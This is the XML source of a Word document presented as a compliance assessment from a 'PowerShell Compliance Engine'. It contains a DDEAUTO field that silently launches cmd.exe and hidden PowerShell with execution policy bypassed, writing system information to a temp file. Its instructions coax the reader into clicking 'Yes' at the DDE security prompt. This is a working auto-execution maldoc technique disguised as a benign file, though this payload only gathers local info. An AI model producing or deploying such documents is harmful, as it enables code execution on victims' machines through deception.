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56"/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t>COMPLIANCE ASSESSMENT VERIFICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>PowerShell Compliance Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>INSTRUCTIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Open this document in Microsoft Word.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. If a DDE security prompt appears, click "Yes" to enable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. The compliance assessment will execute automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. Microsoft Edge will open to confirm execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>AUTOMATED EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO "C:\Windows\System32\cmd.exe" "/c powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Get-ComputerInfo | Out-File $env:TEMP\compliance_report.txt; Start-Process \'msedge.exe\' \'about:blank\'\"" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t>[Compliance Engine - DDE will execute when enabled]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>COMPLIANCE FRAMEWORKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>HIPAA Security Rule - Health data protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SOC 2 Type II - Security controls effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ISO 27001 - ISMS requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t>Compliance Assessment Framework v3.0 - DDE Auto-Execution</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/settings.xml><?xml version="1.0" encoding="utf-8"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:defaultTabStop w:val="720"/>
  <w:zoom w:percent="100"/>
</w:settings>
</file>

<file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:style w:type="paragraph" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:color w:val="2E75B6"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/officeDocument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